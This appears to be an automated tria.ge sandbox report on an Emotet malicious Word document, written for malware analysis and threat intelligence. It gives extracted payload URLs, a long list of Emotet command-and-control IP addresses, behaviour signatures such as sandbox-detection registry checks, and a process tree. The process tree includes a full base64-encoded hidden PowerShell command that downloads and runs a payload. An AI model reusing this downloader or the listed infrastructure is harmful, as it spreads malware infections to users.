Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
143s -
resource
win10v191014 -
submitted
13/12/2019, 07:53
Task
task1
Sample
Docs_7fd7b14acff688e84b811d03e1831552.4.doc
Resource
win7v191014
General
Malware Config
Extracted
http://kaikeline.com/1B/
http://irpot.com/css/jRk5gg/
http://kartcup.net/picture_library/eqop/
http://lakelass.com/cgi-bin/2dhm/
http://ouimet.biz/cgi-bin/l/
Extracted
emotet
173.91.11.142:80
47.6.15.79:80
47.6.15.79:443
37.59.24.177:8080
66.34.201.20:7080
108.179.206.219:8080
45.56.88.91:443
101.187.134.207:443
1.33.230.137:80
110.143.57.109:80
108.191.2.72:80
47.156.70.145:80
167.71.10.37:8080
190.226.44.20:21
74.105.102.97:8080
190.147.215.53:22
24.45.193.161:7080
70.175.171.251:80
138.59.177.106:443
12.176.19.218:80
190.56.255.118:80
190.211.207.11:443
182.176.132.213:8090
31.131.182.30:80
31.31.77.83:443
181.57.193.14:80
149.202.153.252:8080
189.209.217.49:80
169.239.182.217:8080
98.24.231.64:80
176.106.183.253:8080
159.65.25.128:8080
211.63.71.72:8080
45.51.40.140:80
104.131.44.150:8080
85.72.180.68:80
100.14.117.137:80
110.143.84.202:80
188.152.7.140:80
167.99.105.223:7080
186.75.241.230:80
45.33.49.124:443
12.176.19.218:80
50.116.86.205:8080
62.75.187.192:8080
210.6.85.121:80
91.205.215.66:8080
128.65.154.183:443
209.141.54.221:8080
107.170.24.125:8080
178.210.51.222:8080
197.254.221.174:80
66.76.63.99:80
100.14.117.137:80
201.184.105.242:443
101.187.247.29:80
217.160.182.191:8080
107.2.2.28:80
45.51.40.140:80
190.12.119.180:443
212.186.191.177:80
218.44.21.114:80
61.197.110.214:80
165.227.156.155:443
12.229.155.122:80
67.225.179.64:8080
46.105.131.87:80
178.209.71.63:8080
192.241.255.77:8080
59.103.164.174:80
74.105.102.97:8080
185.159.102.74:80
47.156.70.145:80
64.53.242.181:8080
2.38.99.79:80
5.88.182.250:80
110.142.38.16:80
75.80.148.244:80
206.189.112.148:8080
183.102.238.69:465
78.24.219.147:8080
200.7.243.108:443
209.97.168.52:8080
201.173.217.124:443
190.53.135.159:21
73.11.153.178:8080
73.176.241.255:80
104.237.155.168:443
87.106.136.232:8080
75.80.148.244:80
83.136.245.190:8080
212.129.24.79:8080
5.196.74.210:8080
116.48.142.21:443
167.114.242.226:8080
103.86.49.11:8080
70.175.171.251:80
212.64.171.206:80
139.130.241.252:443
206.81.10.215:8080
95.128.43.213:8080
12.229.155.122:80
87.106.139.101:8080
37.157.194.134:443
91.73.197.90:80
80.21.182.46:80
64.53.242.181:8080
58.171.42.66:8080
93.147.141.5:80
176.31.200.130:8080
87.230.19.21:8080
104.236.246.93:8080
144.139.247.220:80
195.244.215.206:80
181.31.213.158:8080
104.131.11.150:8080
120.150.246.241:80
181.143.194.138:443
165.228.24.197:80
92.222.216.44:8080
31.172.240.91:8080
86.98.156.239:443
Signatures
-
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName -
description ioc Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1" -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 4672 16.exe 2912 grouptrns.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4444 Powershell.exe 2912 grouptrns.exe -
Executes dropped EXE 4 IoCs
pid Process 4528 16.exe 4672 16.exe 3876 grouptrns.exe 2912 grouptrns.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 360 wrote to memory of 1836 360 SppExtComObj.exe 75 PID 4444 wrote to memory of 4528 4444 Powershell.exe 79 PID 4528 wrote to memory of 4672 4528 16.exe 80 PID 3876 wrote to memory of 2912 3876 grouptrns.exe 89 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4444 Powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT svchost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4868 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4868 WINWORD.EXE 4528 16.exe 4672 16.exe 3876 grouptrns.exe 2912 grouptrns.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Drops file in System32 directory 6 IoCs
description ioc Process File renamed C:\Users\Admin\16.exe => C:\Windows\SysWOW64\grouptrns.exe 16.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat grouptrns.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 grouptrns.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE grouptrns.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies grouptrns.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 grouptrns.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4868 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_7fd7b14acff688e84b811d03e1831552.4.doc" /o ""1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
PID:4868
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:360 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:1836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABKAGQAZwB5AHQAbABnAHEAbgB0AHUAPQAnAFcAaABiAGsAYwB6AGEAaQBxAHIAZwBuACcAOwAkAE8AYwB3AHkAcAB5AGQAeABtAGoAagBnAGUAIAA9ACAAJwAxADYAJwA7ACQAWQBrAG4AdABkAGoAbwBpAHQAcAA9ACcASABsAGoAZQB2AGcAaQBhAGYAaAAnADsAJABUAHUAeQBjAHgAeABsAHoAbgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATwBjAHcAeQBwAHkAZAB4AG0AagBqAGcAZQArACcALgBlAHgAZQAnADsAJABGAHkAZgBzAG0AegBsAHQAPQAnAFMAZABmAGEAbwBsAGkAeQBpAHYAbgBuACcAOwAkAFUAYgBkAGwAaQB0AHcAcwBnAGwAaABzAGMAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQB0AC4AdwBlAGIAYwBMAGkARQBOAHQAOwAkAFgAcwBjAGsAeAB5AGcAegBoAG4AcwB1AHMAPQAnAGgAdAB0AHAAOgAvAC8AawBhAGkAawBlAGwAaQBuAGUALgBjAG8AbQAvADEAQgAvACoAaAB0AHQAcAA6AC8ALwBpAHIAcABvAHQALgBjAG8AbQAvAGMAcwBzAC8AagBSAGsANQBnAGcALwAqAGgAdAB0AHAAOgAvAC8AawBhAHIAdABjAHUAcAAuAG4AZQB0AC8AcABpAGMAdAB1AHIAZQBfAGwAaQBiAHIAYQByAHkALwBlAHEAbwBwAC8AKgBoAHQAdABwADoALwAvAGwAYQBrAGUAbABhAHMAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvADIAZABoAG0ALwAqAGgAdAB0AHAAOgAvAC8AbwB1AGkAbQBlAHQALgBiAGkAegAvAGMAZwBpAC0AYgBpAG4ALwBsAC8AJwAuACIAUwBgAFAATABpAFQAIgAoACcAKgAnACkAOwAkAEgAbQBrAGcAcgBvAGgAcQBsAGoAbwBmAGUAPQAnAFUAZAB2AHAAbgB0AGcAegB1AHIAeAByAGcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEIAeQBsAHgAcABrAG4AcAB3AGwAZQBtACAAaQBuACAAJABYAHMAYwBrAHgAeQBnAHoAaABuAHMAdQBzACkAewB0AHIAeQB7ACQAVQBiAGQAbABpAHQAdwBzAGcAbABoAHMAYwAuACIARABgAG8AYAB3AE4ATABvAEEAZABGAGAASQBMAGUAIgAoACQAQgB5AGwAeABwAGsAbgBwAHcAbABlAG0ALAAgACQAVAB1AHkAYwB4AHgAbAB6AG4AKQA7ACQAUQByAGUAaABsAGEAbwBlAD0AJwBNAGIAcgB3AG0AagBnAG4AYwAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFQAdQB5AGMAeAB4AGwAegBuACkALgAiAGwARQBuAGAAZwBgAFQASAAiACAALQBnAGUAIAAzADAANwA4ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGEAYABSAFQAIgAoACQAVAB1AHkAYwB4AHgAbAB6AG4AKQA7ACQAWQBnAGQAYQBtAHEAbwB1AHcAYQBxAGkAPQAnAEEAdwBqAHcAZgB6AHQAZwBhAHIAcABjAGgAJwA7AGIAcgBlAGEAawA7ACQARABlAGwAbAB5AHQAeABlAGsAbgB5AD0AJwBMAG0AawBpAGMAcQBpAGoAZQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAHkAcgBnAG0AbABrAGkAZwBkAD0AJwBGAHgAdgBjAGMAcwB5AGoAZwBqAGwAdgBvACcA1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:4444 -
C:\Users\Admin\16.exe"C:\Users\Admin\16.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:4528 -
C:\Users\Admin\16.exe--9b97a9af3⤵
- Suspicious behavior: EmotetMutantsSpam
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
PID:4672
-
-
-
C:\Windows\SysWOW64\grouptrns.exe"C:\Windows\SysWOW64\grouptrns.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:3876 -
C:\Windows\SysWOW64\grouptrns.exe--feb4e2d82⤵
- Suspicious behavior: EmotetMutantsSpam
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
PID:2912
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Drops file in Windows directory
PID:3996
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:2888
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DoSvc1⤵PID:4780
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc1⤵PID:4496
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup1⤵PID:4788